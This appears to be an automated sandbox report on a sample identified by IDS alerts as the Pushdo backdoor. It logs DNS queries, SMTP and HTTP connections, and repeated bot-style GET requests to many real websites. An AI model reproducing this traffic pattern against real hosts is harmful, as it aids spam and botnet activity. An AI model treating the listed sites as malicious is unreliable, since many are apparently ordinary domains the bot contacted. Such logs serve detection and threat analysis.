                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.161.222.85 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.18.7.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.211.245.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 138.201.65.187 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jchysk.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.0.29.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.88.50.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.50.65.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 176.119.200.128 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.250.32.94 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.175.217.57 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.237 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.3 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.79.248.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.150.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.200.235.135 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.71 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.106.129.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                      Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.6:49714 -> 104.21.23.9:80
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 173.231.184.124:80 -> 192.168.2.6:50266
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 63.251.106.25:80 -> 192.168.2.6:50316
                      Source: unknownDNS traffic detected: query: www.wkhk.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cvswl.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: amele.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: websy.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.medisa.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: ludea.cz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: invictus.pl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                      Source: unknownNetwork traffic detected: DNS query count 437
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:52661 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:53163 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:53173 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:53170 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.deContent-Length: 3856
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.deContent-Length: 4428
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=85e4e1a68595ff47778d80e98dbe0065
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
